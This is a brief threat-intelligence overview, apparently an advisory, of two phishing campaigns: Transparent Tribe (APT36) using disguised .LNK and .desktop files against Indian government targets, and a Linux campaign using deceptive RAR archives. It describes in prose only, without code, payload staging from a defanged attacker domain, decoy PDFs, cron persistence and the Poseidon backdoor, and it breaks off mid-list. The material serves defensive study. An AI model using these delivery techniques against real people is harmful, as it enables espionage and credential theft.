Overview
Recent investigations revealed two phishing-driven campaigns exploiting malicious email attachments: Transparent Tribe (APT36): Targets Indian government entities with weaponized .LNK files to deploy RATs for espionage and credential theft. Linux Malware Campaign: Uses malicious RAR archives with deceptive filenames to evade antivirus and install persistent backdoors. Both cases highlight phishing’s adaptability, tailoring payloads and file types to expand attacker reach.
Technical Details
Attack 1: Transparent Tribe with Weaponized LNK Files
- Initial Access: Phishing emails carrying malicious shortcut files (.LNK for Windows, .desktop for Linux BOSS), disguised as PDFs.
- Payload Delivery: Opening the file launches a hidden script that fetches a hex-encoded payload from attacker servers (securestore[.]cv). A decoy PDF is opened to avoid suspicion.
- Execution: On Linux, a shell script drops an ELF binary; on Windows, PowerShell/VB scripts fetch additional malware. Persistence is ensured through cron jobs.
- Payload: Deployment of Poseidon backdoor, enabling data exfiltration…..
